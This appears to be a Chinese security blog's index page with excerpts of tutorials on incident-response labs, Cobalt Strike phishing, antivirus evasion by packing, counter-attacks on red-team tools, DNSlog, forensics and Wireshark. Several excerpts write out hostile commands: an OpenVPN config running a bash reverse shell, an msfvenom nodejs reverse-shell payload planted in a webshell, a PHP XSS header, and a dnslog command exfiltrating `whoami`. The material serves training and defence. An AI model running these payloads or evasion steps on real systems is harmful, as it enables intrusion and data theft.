w0dao's Blog

一、背景：靶机来源：至善攻防实验室 小李在值守的过程中，发现有CPU占用飙升，出于胆子小，就立刻将服务器关机，这是他的服务器系统，请你找出以下内容，并作为通关条件： 1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名(仅域名) 二、攻击者的shell密码发现有phpstudy，发现有apache和nginx这两个中间件 分别查看一下访问日志，nginx的访问日志为空，发现使用的apache这个中间件， 打开访问日志，直接拉到最后面 很明显找到上传的webshell路径 在/content/plugins/tips/shell.php这个路径下 密码为:rebeyond 三、攻击者ip 同样看日志 发现ip 为 192.168.126.1 三、隐藏的账号方法一net localgroup users 加$的就是隐藏账号 方法二 四、 挖矿的域名这个需要对exe进行反编译，没怎么接触过逆向，参考网上笔记写的 排查上面找到隐藏账号的目录，发现kaung.exe文件，运行后cpu拉满， ...

一、钓鱼邮件钓鱼邮件一般采用远程控制后门木马（毕竟攻防演练中整个具有破坏性的病毒时违反演练归档的） 1.1、钓鱼文件生成 cobaltstrie生成钓鱼文件 1.1.1、普通exe 1.2、exe免杀 因为杀毒软件病毒库几乎每周都会更新，免杀技术时效性很强 1.2.1、常见查杀方式 静态查杀：对文件进行特征匹配的思路 云查杀：对文件内容及行为的检测 动态查杀：对其产生的行为进行检测 1.2.2、加壳 部分杀毒软件会将加壳后的程序视为恶意文件 利用特殊的算法，度可执行文件里的资源进行压缩，只不过这个压缩,只不过这个压缩文件，可以独立运行，解压过程完全隐蔽，都在内存中完成。windows平台常见的壳如upx（压缩壳）、vmp（虚拟机壳）、穿山甲（加密壳） themida：通过加密、虚拟化、防调试等技术来保护Windows程序的安全性和可控性。但加壳后的程序在部分系统上可能会运行失败（任何形式的加密混淆都可能导致无法运行）。 不加壳之前，火绒秒杀 直接把生成的exe拉到themia中 点击protect 加壳成功后，火绒没有查杀出来 1.3、shellcode加载器she ...

一、cobaltstrie简介 所用的工具和脚本 https://wudao3579.oss-cn-beijing.aliyuncs.com/tools/cobaltstrike4.3.zip https://wudao3579.oss-cn-beijing.aliyuncs.com/tools/CobaltStrikeParser.zip、 https://wudao3579.oss-cn-beijing.aliyuncs.com/tools/CS_fakesubmit.zip Cobalt Strike（简称为CS）是一款团队作战渗透测试神器，是一种可以用来进行横向移动、数据窃取、鱼叉式钓鱼的后渗透工具，分为客户端和服务端，一个客户端可以连接多个服务端，一个服务端也可以对应多个客户端连接。 cobaltsrike运行需要java运行环境 1.1、服务端 服务端是sh脚本，需要在Linux操作系统上执行 chmod +x teamserver./teamserver [server_ipaddress] [password] 192.168.43.128是CS服务端的 ...

一、Openvpn反制openvpn是常见的vpn服务，通过信息泄露、漏洞攻击或钓鱼获取vpn配置文件直接攻入内网，是红队渗透测试常用的技术。 1.1、linux 伪造openvpn配置文件1.open remote 192.168.31.137ifconfig 10.200.0.2 10.200.0.1dev tunscript-security 2up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.43.128/9090 0<&1 2>&1&'" 上面所有ip地址都不用变，下面的tcp/后面的ip地址改为kali或者云服务器的，用来反弹shell，执行命令 openvpn --config 1.ovpnnc -lvvp 9090 1.2、Windowswindows并没有bash，使用powershell反弹shell的命令非常长，由于openvpn限制配置文件不能超越256个字符，故windows尚无利用方法。 当然也有例外，如果 ...

一、蚁剑反制 AntSowrd<=2.0.7 1.1、webshell连接php -S 0.0.0.0:9991 1.2、反制antsword 课程为了演示需要，是单独创建的webshell.php 、webshell2.php 、webshell3.php实际流程是蓝队通过入侵排查发现红队传入的webshell文件，直接修改webshell文件，红队再次连接时就会中招 1.2.1、弹窗<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?> 更改webshell 更改后在连接后触发弹窗 1.2.2、反制 生成nodejs反弹shell脚本 msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.43.128 LPORT=12333 -f base64 192.168.43.128是kali的IP地址 将生成的base64编码后的字符替换到下面的buffer <?php head ...

一、dnslog1.1、DNSlong原理DNS在解析的时候会留下日志，这类工具就是读取多级域名的解析日志，来获取信息，简单来说就是把信息放在多级子域名中，传递到我们自己的服务器中，然后读取日志，获取特定信息，最后根据获取的信息来判断我们渗透测试的动作是否成功运行。在一些无回显的漏洞利用中，DNSlog被广泛使用。 常见的DNSLOG平台： DNSLog Platform DNSLOG Platform (dig.pm) https://ceye.io/ 1.2、dnslog红队应用场景DNS外带 ping `whoami`.8o5x9p.dnslog.cn 1.3、dnslog反制针对dnslog和httplog 的反制，获取到对方的payload 的url ，然后批量使用站长之家进行批量ping 或者使用腾讯云函数进行批量访问，对方列表会满满的都是请求。而且大部分dnslog显示会有上限，会不断覆盖，影响其正常使用。 多地ping：多个地点Ping服务器,网站测速 - 站长工具 (chinaz.com) 平台一般都有限制，一次最多显示10条数据，可以根据这种方式来进 ...

一、电子取证电子取证是指利用计算机软硬件技术，以符合法律规范的方式对计算机入侵、破坏、欺诈、攻击等犯罪行为进行证据获取、保存、分析和出示的过程。从技术方面看，计算机犯罪取证是一个对受侵计算机系统进行扫描和破解，对入侵事件进行重建的过程。具体而言，是指把计算机看作犯罪现场，运用先进的辨析技术，对计算机犯罪行为进行解剖，搜寻罪犯及其犯罪证据。取证分为现场勘查阶段 和 证据分析阶段 现场勘查阶段 主要任务是获取可能的物理证据，如嫌疑人的计算机、移动硬盘、U盘、手机、数码相机、数字存储卡等各种可能包含证据的介质。 证据分析阶段 对获取的存储设备进行深入检查，发现可能的电子证据并生成报告，以便提交给法庭作为诉讼证据。 法律法规： 公安机关办理刑事案件电子数据取证规则： http://gaj.cq.gov.cn/zslm_245/wlaqgl/flfg/201912/t20191221_2043591.html 计算机犯罪现场勘验与电子证据检查规则： http://www.fakuyun.com/index.php?m=content&c=index&a=show ...

一、威胁情报威胁情报是有关组织可能面临的潜在攻击以及如何检测阻止这些攻击的信息。执法部门有时会分发带有嫌疑人信息的“通缉”海报；同样，网络威胁情报包含有关当前威胁是什么样子以及它们来自何处的信息。在数字安全术语中，“威胁”是一种恶意行为，可能导致数据在未经许可的情况下被盗、丢失或更改。该术语指的是潜在的和实际的攻击。威胁情报使组织能够针对威胁采取行动，而不仅仅是提供数据。每一条威胁情报都有助于检测和预防攻击。某些类型的威胁情报可以输入防火墙、Web 应用程序防火墙 (WAF)、安全信息和事件管理 (SIEM) 系统以及其他安全产品，使它们能够更有效地识别和阻止威胁。其他类型的威胁情报更为通用，可帮助组织做出更大的战略决策。 微步威胁情报 https://x.threatbook.com/ 奇安信威胁情报平台 https://ti.qianxin.com/ 腾讯安全威胁情报平台 https://tix.qq.com/ 这些平台结合使用,单个平台所显示的信息可能不全 这里以微步社区为例， 我的服务器上的资产图 使用lastb命令，随便找一个尝试爆破我ssh账号密码的服务器ip为例 ...

一、同源策略 同源策略简而言之就是 ​ 协议、域名、端口都相同 同源策略是由Netscape提出的一个著名的安全策略，现在所有支持JavaScript的浏览器都会使用这个策略，同源策略用于限制从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。不同源的客户端脚本在没有明确授权的情况下，不能读写对方资源。（DOM、Cookie、三方插件以及XML HttpRequest），其中带src属性的标签不受同源策略的限制 这些标签不受同源策略影响 , 场景1： 百度网盘能从百度中获取到登录信息 CSDN不能从百度中获取到登录信息 场景2： 同源策略测试： req = new XMLHttpRequest() req.open("GET","https://www.baidu.com") req.send() 如果www.baidu.com存在跨域缺陷，同源策略就会杯打破。 二、蜜罐溯源 web蜜罐收集个人信息使用技术主要有两种，分别是JSONP跨域劫持和XSS。在学习jsonp之前，需要了解浏览器的同源策略 蜜罐 ...

一、wireshark基础 Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。 在过去，网络封包分析软件是非常昂贵的，或是专门属于盈利用的软件。Ethereal的出现改变了这一切。在GNUGPL通用许可证的保障范围底下，使用者可以以免费的途径取得软件与其源代码，并拥有针对其源代码修改及客制化的权利。Ethereal是全世界最广泛的网络封包分析软件之一。 wireshark和burpsuite的区别 burpsuite：抓取http/https/ws协议，可以修改包，用作中间人攻击 wireshark：抓取TCP/IP模型所有协议，不能修改包，用作流量分析 基本结构 二、Wireshark使用2.1、捕获过滤器 捕获过滤器的类型Type（host、net、port） 方向Dir（src、dst） 协议Proto(ether、ip、tcp、udp、http、icmp、ftp等) 逻辑运算 ...